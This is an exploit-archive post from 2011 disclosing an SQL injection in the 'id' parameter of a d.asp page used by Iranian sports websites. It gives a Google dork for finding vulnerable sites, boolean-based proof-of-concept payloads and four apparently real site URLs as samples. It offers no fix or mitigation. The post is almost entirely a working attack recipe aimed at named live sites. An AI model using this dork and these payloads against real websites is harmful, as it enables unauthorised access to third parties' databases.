Home / exploits Iran Sports Network SQL Injection
Posted on 22 December 2011
############################### HUT CNIS ############################# # Exploit Title: Iran sports network SQL INJECTION Vulnerability # Date: [2011/10/19] # Author: S.Azadi # Google Dork: inurl:d.asp site:.ir # Vulnerability Type: SQL Injection # Version: All version #--------------------------------------------------------------------- Technical Details: - SQL INJECTION: There is a SQLI vulnerability on d.asp page and parameter id. http://sitename/d.asp?id=[SQLI] PoC: http://sitename/d.asp?id=25928 and 1=0;-- http://sitename/d.asp?id=25928 and 1=1;-- sample: http://www.irantriathlon.ir/d.asp?id=25928 http://www.sporttehran.ir/d.asp?id=25921 http://www.chesstehran.ir/d.asp?id=26403 http://www.blindsports.ir/d.asp?id=25862 # # # ###########-HUT Center for Network and Information Security-################